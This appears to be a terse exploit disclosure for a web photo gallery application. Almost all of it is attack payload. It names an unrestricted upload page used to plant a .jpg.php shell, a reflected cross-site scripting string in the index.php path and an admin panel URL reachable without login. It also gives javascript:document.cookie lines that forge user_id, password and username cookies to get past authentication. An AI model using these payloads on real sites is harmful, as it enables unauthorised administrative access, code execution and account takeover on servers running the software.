I- http://www.example.com/gallery/up.php (To upload Evil ) II- http://www.example.com/gallery/userup/1266607903.jpg.php (To Find Evil) 2 - XSS: http://www.example.com/gallery/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt> 3 - By Pass: http://www.example.com/gallery/cp/menu.php Insecure Cookie Handling Vulnerability: I- javascript:document.cookie="user_id=userid;path=/"; II- javascript:document.cookie="password=password;path=/"; III- javascript:document.cookie="username=username;path=/"; IIV- javascript:document.cookie="ok=tmam;path=/";